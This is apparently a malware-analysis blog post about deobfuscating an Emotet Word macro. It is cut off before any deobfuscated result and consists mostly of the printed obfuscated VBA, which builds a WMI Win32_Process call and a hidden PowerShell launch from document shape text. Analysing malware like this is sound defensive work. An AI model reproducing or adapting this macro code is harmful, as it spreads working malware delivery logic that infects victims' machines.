2020-09-22 Deobfuscating Emotet Script

Summary
=========
In this post I am going to cover how I managed to deobfuscate the macro for this Emotet (Epoch 2) sample.

The maldoc can be found here.

Analysis
==========
With this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately I got a lot of Python errors when trying to run this. I then tried to run it through OfficeMalScanner and got nothing back as well. Looking at the Word doc via “file” I could see that there was a macro in the file and it wasn’t a rich-text file or something like that.

herbie$ file LRE-090120\ JYW-092120.doc 
LRE-090120 JYW-092120.doc: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestias., Author: Clara Leroux, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 21 16:38:00 2020, Last Saved Time/Date: Mon Sep 21 16:38:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 32, Security: 0

Since OleTools and OfficeMalScanner didn’t work, I then used the other failsafe which is Didier Stevens’ Oledump script. Using this I was able to see what appeared to be 2 macros in the Word doc as seen below (denoted by the ‘M’).

herbie$ ./oledump.py LRE-090120\ JYW-092120.doc 
1: 114 '\x01CompObj'
2: 352 '\x05DocumentSummaryInformation'
3: 424 '\x05SummaryInformation'
4: 7035 '1Table'
5: 125813 'Data'
6: 514 'Macros/PROJECT'
7: 92 'Macros/PROJECTwm'
8: 97 'Macros/Uoepmfd2vqk2/\x01CompObj'
9: 296 'Macros/Uoepmfd2vqk2/\x03VBFrame'
10: 438 'Macros/Uoepmfd2vqk2/f'
11: 504 'Macros/Uoepmfd2vqk2/o'
12: M 27502 'Macros/VBA/Uoepmfd2vqk2'
13: M 1679 'Macros/VBA/V216c23yqw7e5o2v'
14: 15352 'Macros/VBA/_VBA_PROJECT'
15: 1540 'Macros/VBA/__SRP_0'
16: 106 'Macros/VBA/__SRP_1'
17: 304 'Macros/VBA/__SRP_2'
18: 103 'Macros/VBA/__SRP_3'
19: 860 'Macros/VBA/dir'
20: 4096 'WordDocument'

I started with the first stream that was found (-s 12) to see what was there. Bingo. We have obfuscated code.

herbie$ ./oledump.py -v -s 12 LRE-090120\ JYW-092120.doc 
Attribute VB_Name = "Uoepmfd2vqk2"
Attribute VB_Base = "0{5BB1BF4C-1019-4625-9105-80272C0DD792}{28F2CF55-40FF-4E43-8677-C56C8C692899}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Cbzdhgt82a6foxc53q()
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(S_k9lapvm1p, 196, 1)
dYvJsnjw = Mid _
(Z__ibn17mkfjsiol5, 212, 1)
BiHOVG = Mid _
(Qsj_pi2ufi2852dgfe, 35, 1)
GQJzwq = Mid _
(Dru0bzo5apcxe2pc9, 34, 1)
WKcaSvfi = Mid _
(Zv3rshseproglck, 9, 1)
lsFUF = Mid _
(Srdtikao2ecvxgp, 240, 1)
VAwYHAcv = Mid _
(Eyfuay0mr8k9q6da, 20, 1)
hNfbEKURZVE = Mid _
(Pb0_ok1un1of8, 179, 1)
wYVOV = Mid _
(Gb1_y82tas2cma, 190, 1)
mLdZb = Mid _
(Z8abjber13o, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Zx0vguob716qdw, 33, 1)
zmlHaKIVkFA = Mid _
(Aqil91rp5ne, 168, 1)
UCPVYn = Mid _
(Levahjr27c9ut9_h, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Bu9x_darrq2t, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Quuseim6entz = 90
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Lakcnp87s71f7n9y, 196, 1)
dYvJsnjw = Mid _
(A5ggaxmwnp7jz7c, 212, 1)
BiHOVG = Mid _
(Co19uulv2shhotan, 35, 1)
GQJzwq = Mid _
(Fezxrpn9ra_, 34, 1)
WKcaSvfi = Mid _
(Q4_yp40i1ar, 9, 1)
lsFUF = Mid _
(Ppsqfi6oser3odx, 240, 1)
VAwYHAcv = Mid _
(Iadulufzhu01cfphyg, 20, 1)
hNfbEKURZVE = Mid _
(B893ifwurmi, 179, 1)
wYVOV = Mid _
(Ig_7z98hck4iw, 190, 1)
mLdZb = Mid _
(Dlm1jdicvcpi6, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Sayn_kxudj1k20, 33, 1)
zmlHaKIVkFA = Mid _
(Tezg_bkh3cebjv9rrc, 168, 1)
UCPVYn = Mid _
(Nbxqjlxuida0njd, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Y1b7np47k6in_f4ji, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Ay7pmbj8ld_rk9 = Vc0veos27yszc + Chr$(Quuseim6entz + (25))
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Abmzntc3d7_5amw0a, 196, 1)
dYvJsnjw = Mid _
(Ssiyk2ux0lw, 212, 1)
BiHOVG = Mid _
(J8k82drrm2h, 35, 1)
GQJzwq = Mid _
(L_n7e5rsggqtwn, 34, 1)
WKcaSvfi = Mid _
(Pe2u3fatdtdwtsuz0, 9, 1)
lsFUF = Mid _
(Uhknysf5e7gq2, 240, 1)
VAwYHAcv = Mid _
(Jm6mwhqjprkma, 20, 1)
hNfbEKURZVE = Mid _
(Y_xrrj5friri, 179, 1)
wYVOV = Mid _
(Ybfmy44jhyhd35, 190, 1)
mLdZb = Mid _
(U5cls96fiz0rri6, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Wn3tikexth03mqo, 33, 1)
zmlHaKIVkFA = Mid _
(Llmyff2sc78x1mma, 168, 1)
UCPVYn = Mid _
(Al2_kktzq3k0d, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Uliag7hq1xkqnnr9h, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Ihietwpuyrj0nq6 = "g, bq,g, bq,wg, bq,ig, bq,nmg, bq,g, bq,gmg, bq,tg, bq,g, bq," + Ay7pmbj8ld_rk9 + "g, bq,g, bq,:g, bq,wg, bq,ing, bq,g, bq,3g, bq,2g, bq,_g, bq," + Uoepmfd2vqk2.Wjhx20hqda94eekj + "g, bq,rog, bq,g, bq,ceg, bq,sg, bq,sg, bq,"
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(R4j1tt_lcy2h4atkuq, 196, 1)
dYvJsnjw = Mid _
(Ypad86i99ny8cbz2, 212, 1)
BiHOVG = Mid _
(K4eftvdnstug, 35, 1)
GQJzwq = Mid _
(E15ttry1n7lw, 34, 1)
WKcaSvfi = Mid _
(Yp3yfejl73l, 9, 1)
lsFUF = Mid _
(K691ply3zg9cush, 240, 1)
VAwYHAcv = Mid _
(Nc85trxzv5o, 20, 1)
hNfbEKURZVE = Mid _
(X9l9safw2_9vx6, 179, 1)
wYVOV = Mid _
(Tr1ex8g457s_8, 190, 1)
mLdZb = Mid _
(Gev8i726avun, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Jselgze7h712u1f, 33, 1)
zmlHaKIVkFA = Mid _
(Baaior7nzp_w8r, 168, 1)
UCPVYn = Mid _
(Pkl5kzull4mb, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Wfzfwn9uteh7, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Wuueqzhfpms6gh3_p = Zk46e7c8d40(Ihietwpuyrj0nq6)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Lakeb7tqigcm, 196, 1)
dYvJsnjw = Mid _
(Xh7xheg1ff26, 212, 1)
BiHOVG = Mid _
(Oi_e2jr0uxx3s, 35, 1)
GQJzwq = Mid _
(T8clzmkouz4xzsqk, 34, 1)
WKcaSvfi = Mid _
(Ok2mkreq47hnui6zo, 9, 1)
lsFUF = Mid _
(Uc6ctagykldv0s, 240, 1)
VAwYHAcv = Mid _
(Ucs3orq067qda, 20, 1)
hNfbEKURZVE = Mid _
(L90ldxhas21, 179, 1)
wYVOV = Mid _
(Qg4mi8zd4fn9, 190, 1)
mLdZb = Mid _
(Yne_gc9fy6ofj77b3v, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Bi6jftxuo9ikvamek, 33, 1)
zmlHaKIVkFA = Mid _
(Alz3a0loh0b, 168, 1)
UCPVYn = Mid _
(Bbvw72ed0rutuiqu5, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Y2v01jcji792, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Set Cfsnuq6d3vy5e = CreateObject(Wuueqzhfpms6gh3_p)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Qim37oqtd3b8p, 196, 1)
dYvJsnjw = Mid _
(Ejqk82c1t5jf5wvd8, 212, 1)
BiHOVG = Mid _
(B7k3xvnrori_n92x23, 35, 1)
GQJzwq = Mid _
(Bkpg8zss2u59_7c6uv, 34, 1)
WKcaSvfi = Mid _
(Q79pmwruqmog64, 9, 1)
lsFUF = Mid _
(Vzx1ncecw8ut, 240, 1)
VAwYHAcv = Mid _
(Clcgbnfce7cvq, 20, 1)
hNfbEKURZVE = Mid _
(Bfmn0e6ani6i, 179, 1)
wYVOV = Mid _
(M5ls4ciqfkifs, 190, 1)
mLdZb = Mid _
(B15ue89c8jtwood9, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(J4byj4nktiz87eirs, 33, 1)
zmlHaKIVkFA = Mid _
(Iuz1lop8c0gy5nhr7, 168, 1)
UCPVYn = Mid _
(L_48rjwzjfbel, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Xw3oexsyjn2o, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Oxxxpk19hkgi4c7c0z = Zdlifyn2pwzi0u2e4i + Wuueqzhfpms6gh3_p + Ay7pmbj8ld_rk9 + Uoepmfd2vqk2.W8w3wpmit80chp7lx + Uoepmfd2vqk2.Dd8cp5opvyber
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Beh18bbci4uibjmm, 196, 1)
dYvJsnjw = Mid _
(Vidj9mvisxz0, 212, 1)
BiHOVG = Mid _
(T0nlexcitv5n7, 35, 1)
GQJzwq = Mid _
(Bekqhtlgj1sd3xr, 34, 1)
WKcaSvfi = Mid _
(Kmd0bw61e1k_ky, 9, 1)
lsFUF = Mid _
(Xc1teihsq0u1y, 240, 1)
VAwYHAcv = Mid _
(A6q3egsj8uqjulsim, 20, 1)
hNfbEKURZVE = Mid _
(Pqwbcdmgh6xas8g7d6, 179, 1)
wYVOV = Mid _
(Fgr3xgfd6y7aiwzdi, 190, 1)
mLdZb = Mid _
(Z4mp0_yx7ctc, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Fxoezfz_78assl5p, 33, 1)
zmlHaKIVkFA = Mid _
(V40yebt4ire_kd, 168, 1)
UCPVYn = Mid _
(U_yn5r_0uie8l9q, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Virj2eadw7mryvav, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Set Tn1cdl9lltyho4skel = Ngdcwyg32b4skvo5c1(Oxxxpk19hkgi4c7c0z + Uoepmfd2vqk2.Wjhx20hqda94eekj)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(T_zbtc1w4mtq, 196, 1)
dYvJsnjw = Mid _
(Mcnx530dlo80, 212, 1)
BiHOVG = Mid _
(Mlly4qz_3dfgo0, 35, 1)
GQJzwq = Mid _
(A1eojnxok57cmfrw, 34, 1)
WKcaSvfi = Mid _
(Bfvplftc2i10iqp5l, 9, 1)
lsFUF = Mid _
(Pksza68a59o, 240, 1)
VAwYHAcv = Mid _
(Wksnejoi1vvmt, 20, 1)
hNfbEKURZVE = Mid _
(Xqcnqjac7mko, 179, 1)
wYVOV = Mid _
(Stllwynnpr6, 190, 1)
mLdZb = Mid _
(Epdnazgg79q9q, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Dn3pgd2fy1pk_y, 33, 1)
zmlHaKIVkFA = Mid _
(Us0ibk5817xd, 168, 1)
UCPVYn = Mid _
(G3cn6et_v_l2, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(A3o021tadpr1phl, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Cfsnuq6d3vy5e.Create Qfyk87zgdp86ufle, P3_qwk943i1k8ql6, Tn1cdl9lltyho4skel
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Yj0lpxol1uc, 196, 1)
dYvJsnjw = Mid _
(A97xzc8zmeh36, 212, 1)
BiHOVG = Mid _
(Agnkq3qp0_vhben3o, 35, 1)
GQJzwq = Mid _
(Rul9thh69tz5b, 34, 1)
WKcaSvfi = Mid _
(Mvwh9qdl9v_8, 9, 1)
lsFUF = Mid _
(Ma3lu27dltd, 240, 1)
VAwYHAcv = Mid _
(Ecv682f9o1qtg59i, 20, 1)
hNfbEKURZVE = Mid _
(P10wf16fhedgd, 179, 1)
wYVOV = Mid _
(Btu3otra66_y, 190, 1)
mLdZb = Mid _
(Ojf14y1z5ebbn1zzw, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Tluo_wcuz7v, 33, 1)
zmlHaKIVkFA = Mid _
(Dxr9k7bpltnrjos1b, 168, 1)
UCPVYn = Mid _
(Ulj4imigjtxi05d0a, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Opp4yh2i0cfwem, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
Function Ngdcwyg32b4skvo5c1(Wu67qms7o3ov3f_u2)
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(E8sewtjp2ud, 196, 1)
dYvJsnjw = Mid _
(Croq4u8zd29c4txpk_, 212, 1)
BiHOVG = Mid _
(Eooe3vwi6pvzeh, 35, 1)
GQJzwq = Mid _
(B0jjxd0u0p_p, 34, 1)
WKcaSvfi = Mid _
(B76f3c0wzmx6h, 9, 1)
lsFUF = Mid _
(Bjsc47xrzgbno, 240, 1)
VAwYHAcv = Mid _
(Vqz3gkf0vp8c, 20, 1)
hNfbEKURZVE = Mid _
(Pnwwop38lqngu, 179, 1)
wYVOV = Mid _
(Phydpz23jx6z9hdz, 190, 1)
mLdZb = Mid _
(E2xbdduy9xk, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Amwwvt38msns5d0, 33, 1)
zmlHaKIVkFA = Mid _
(Ssu5wmhp9ysedqrcr, 168, 1)
UCPVYn = Mid _
(Gkjdmyl32xoe, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ze40pcq8yfgz, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Set Ngdcwyg32b4skvo5c1 = GetObject(Wu67qms7o3ov3f_u2)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Ntysp0l_ijtph1k77, 196, 1)
dYvJsnjw = Mid _
(Y_z2nu_f36djtt0t, 212, 1)
BiHOVG = Mid _
(C_rqx3dp787eu7bhly, 35, 1)
GQJzwq = Mid _
(E2fesjhq8_1_, 34, 1)
WKcaSvfi = Mid _
(R4g8okkhwmsxea, 9, 1)
lsFUF = Mid _
(Zbci74ng960h, 240, 1)
VAwYHAcv = Mid _
(Ihqf9oq3zf4bn9, 20, 1)
hNfbEKURZVE = Mid _
(Kyroi0q69seylwj, 179, 1)
wYVOV = Mid _
(Ld57o7m11vq, 190, 1)
mLdZb = Mid _
(Xjgs643kov0r7, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Ny42efqen0ucg, 33, 1)
zmlHaKIVkFA = Mid _
(I3yysf0ylx4t60x, 168, 1)
UCPVYn = Mid _
(Dnabnz8_ql637i04w, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Yx9k01n6mg9w, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Ngdcwyg32b4skvo5c1. _
showwindow = wdKeyEquals - wdKeyEquals
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(N8z1qrw043qy, 196, 1)
dYvJsnjw = Mid _
(Cwoi88pz8kpt1, 212, 1)
BiHOVG = Mid _
(Q5x7sqeifek9, 35, 1)
GQJzwq = Mid _
(Tq00bpbyyxtsjyuwx, 34, 1)
WKcaSvfi = Mid _
(E1i0fg80if8rk, 9, 1)
lsFUF = Mid _
(Zcyi9moezv_gdoi3vw, 240, 1)
VAwYHAcv = Mid _
(Wdhw4l4cdh73hnw, 20, 1)
hNfbEKURZVE = Mid _
(E_mzk8cby0_ds1q, 179, 1)
wYVOV = Mid _
(H0p53r79fkk9444, 190, 1)
mLdZb = Mid _
(M7b4i9i0bg06l1un2, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Mi9321douawfj, 33, 1)
zmlHaKIVkFA = Mid _
(Dgvxyxmn2r4wtbwp1, 168, 1)
UCPVYn = Mid _
(Eslv62elz6ohn88dzf, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Yze0fsr0ehc, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
Function Zk46e7c8d40(G7b_e54iwh7id_)
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(L31m5rr9jos, 196, 1)
dYvJsnjw = Mid _
(Csilqzwq_u8iwbn76b, 212, 1)
BiHOVG = Mid _
(Ca1um8zqqh_8ew8g9e, 35, 1)
GQJzwq = Mid _
(Arn9d87r24ewchpo8o, 34, 1)
WKcaSvfi = Mid _
(Xo3jfi_x3xz6q2_as2, 9, 1)
lsFUF = Mid _
(Qyqp9ymw8z1, 240, 1)
VAwYHAcv = Mid _
(Z4aisjih1dje, 20, 1)
hNfbEKURZVE = Mid _
(B9y6dg9x63jq05v5x, 179, 1)
wYVOV = Mid _
(Ycozcptr3ju, 190, 1)
mLdZb = Mid _
(Npmu82y25t3vf, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(T4tpyodalbr, 33, 1)
zmlHaKIVkFA = Mid _
(Wimxpydsi6do9, 168, 1)
UCPVYn = Mid _
(E7jpk5ucz19mwgktd, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ct7pphedsy371, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
X8e38jclqayh83g3a6 = CleanString(G7b_e54iwh7id_)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(C6r3ywvl9t2w7hk_g, 196, 1)
dYvJsnjw = Mid _
(Pj5z77yujf3qizd038, 212, 1)
BiHOVG = Mid _
(Hdv0f3uegx62vk, 35, 1)
GQJzwq = Mid _
(Nxap_wddnpu, 34, 1)
WKcaSvfi = Mid _
(Hbt8qos76_ly8l, 9, 1)
lsFUF = Mid _
(M9opggegr0m96g_i, 240, 1)
VAwYHAcv = Mid _
(Pkjdy2pncojtlms, 20, 1)
hNfbEKURZVE = Mid _
(Wwg0anlg7c9dqxz6, 179, 1)
wYVOV = Mid _
(Ucwbx6g0bd37xfw6i, 190, 1)
mLdZb = Mid _
(P5jsj0civ4m8qzo3tk, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Qi3_a0juli8miixebs, 33, 1)
zmlHaKIVkFA = Mid _
(Uy0pjowfydr7x, 168, 1)
UCPVYn = Mid _
(Yv355jtap3_zr, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(R4vmjirjz4s, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Hy1d43_mrbnkby5l = Split(X8e38jclqayh83g3a6, "g, bq,")
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Wm10z37ev280anbn, 196, 1)
dYvJsnjw = Mid _
(H6gq1q0gau0gz, 212, 1)
BiHOVG = Mid _
(Qot_o1_i5snhka, 35, 1)
GQJzwq = Mid _
(Cypl2hs2jg723, 34, 1)
WKcaSvfi = Mid _
(F908lkvsoyykbazc, 9, 1)
lsFUF = Mid _
(E0688t69iexj5s, 240, 1)
VAwYHAcv = Mid _
(Fuwuol013wj3xrgrcg, 20, 1)
hNfbEKURZVE = Mid _
(S493lpd0df9ivf1c, 179, 1)
wYVOV = Mid _
(Kfzghicky3ircy, 190, 1)
mLdZb = Mid _
(Cf4fk4lfkn6v5oz, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Xozc8rstu7ryx7r, 33, 1)
zmlHaKIVkFA = Mid _
(Mnepnu4zd_o, 168, 1)
UCPVYn = Mid _
(Ixj70flcnwywxjwol, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Np75dqjjjnw_08dy, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
B4ru9eb_hhowd = Sg918dyn87p9_2 + Join(Hy1d43_mrbnkby5l, Gcqeayz9i6vt1m44y1)
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Rn60_vw9ki0a5akw, 196, 1)
dYvJsnjw = Mid _
(Mqesnmb7i1uj3elp, 212, 1)
BiHOVG = Mid _
(Kl93_qjt6042y, 35, 1)
GQJzwq = Mid _
(Cv_b0_hlb4d3, 34, 1)
WKcaSvfi = Mid _
(Aztexwux_z7ra7_tn, 9, 1)
lsFUF = Mid _
(Dvvry4cnpbdj, 240, 1)
VAwYHAcv = Mid _
(Rivi6l6gfdte, 20, 1)
hNfbEKURZVE = Mid _
(Cv0ei3yv9gkva2bkgs, 179, 1)
wYVOV = Mid _
(Suhjpxfhscarcm3, 190, 1)
mLdZb = Mid _
(Nol5lvu2bly6v580, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Zon7lurdvgt9zhi, 33, 1)
zmlHaKIVkFA = Mid _
(Bt76zhearid_, 168, 1)
UCPVYn = Mid _
(Qygb8c9p4h652, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ka4mdpvtlae73kmp, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Zk46e7c8d40 = B4ru9eb_hhowd
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(J2hq9d7fh_35w37, 196, 1)
dYvJsnjw = Mid _
(Qzaz3l4map05, 212, 1)
BiHOVG = Mid _
(E6d_d1y90o683, 35, 1)
GQJzwq = Mid _
(X2ft_p4no8w4b9, 34, 1)
WKcaSvfi = Mid _
(Lteb3aez6tchkykg3, 9, 1)
lsFUF = Mid _
(V8v770pv4qg, 240, 1)
VAwYHAcv = Mid _
(Hz1ct716aq3cl, 20, 1)
hNfbEKURZVE = Mid _
(Yhszd264hbjuxgxgiz, 179, 1)
wYVOV = Mid _
(Minshfpq8_oetv8, 190, 1)
mLdZb = Mid _
(Fcdnqtsrz50, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Oi5idu52uzlu, 33, 1)
zmlHaKIVkFA = Mid _
(H94481_2epeelc92, 168, 1)
UCPVYn = Mid _
(Uogg7zgfb_2frt3uyf, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Sz4d_sp41e3r7ay, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
End Function
Function Qfyk87zgdp86ufle()
On Error Resume Next
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(M7xg60mfwvhnr6jtot, 196, 1)
dYvJsnjw = Mid _
(Y0gc8q4z0esg, 212, 1)
BiHOVG = Mid _
(Hfm2hak4b9qmfoo9y5, 35, 1)
GQJzwq = Mid _
(Onxbk521bjnb, 34, 1)
WKcaSvfi = Mid _
(Kjcmstmoio7, 9, 1)
lsFUF = Mid _
(T12bp3lknww, 240, 1)
VAwYHAcv = Mid _
(Cc9qkjty8m98mcpf, 20, 1)
hNfbEKURZVE = Mid _
(Um02aud_yxsc22, 179, 1)
wYVOV = Mid _
(Qoiqw7d07ieo451mm, 190, 1)
mLdZb = Mid _
(Uvjx9ds5rxxb, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Ewdk950uwzndt8g, 33, 1)
zmlHaKIVkFA = Mid _
(D9kf89fu_qe03, 168, 1)
UCPVYn = Mid _
(Lm5w04zu4tnwh8, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(Ophmulzn8ziqtkrza4, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Puw2oumxgis = "powe" + "rshe" + V216c23yqw7e5o2v.Content.Application.ActiveDocument.InlineShapes(1@).AlternativeText$
Set nnnnnnnnn = Languages
BcfWWjIUB = Mid _
(Oeqcm_gbql69pr, 196, 1)
dYvJsnjw = Mid _
(P4gtyykmim4tkfkr6, 212, 1)
BiHOVG = Mid _
(Yj6i49td8tp, 35, 1)
GQJzwq = Mid _
(R181wcx8d2k3h2uq, 34, 1)
WKcaSvfi = Mid _
(Xf6_7qi8najau238uy, 9, 1)
lsFUF = Mid _
(Quui500h0da, 240, 1)
VAwYHAcv = Mid _
(Jchbnv14jz4, 20, 1)
hNfbEKURZVE = Mid _
(Bn8u_t6ycr5m, 179, 1)
wYVOV = Mid _
(Yab9jj5m079n1, 190, 1)
mLdZb = Mid _
(I66492lgrboiqi, 265, 1)
zOJzf = BcfWWjIUB + dYvJsnjw + BiHOVG + GQJzwq + WKcaSvfi + lsFUF + VAwYHAcv + hNfbEKURZVE + wYVOV + mLdZb
UNfjikDjKTc = Mid _
(Z8i7zqvz7ap_8, 33, 1)
zmlHaKIVkFA = Mid _
(M_hkft4hz7v, 168, 1)
UCPVYn = Mid _
(Tu_ta5w00_z, 10, 1)
EIjom = zOJzf + UNfjikDjKTc + zmlHaKIVkFA + UCPVYn
SFwwBAcXs = Mid _
(A02g_3t3od0ch0, 44, 1)
scjHiSYQBQp = EIjom + SFwwBAcXs
Qfyk87zgdp86ufle = Zk46e7c8d40(Puw2oumxgis)
Set nnnnnnnnn = Languages
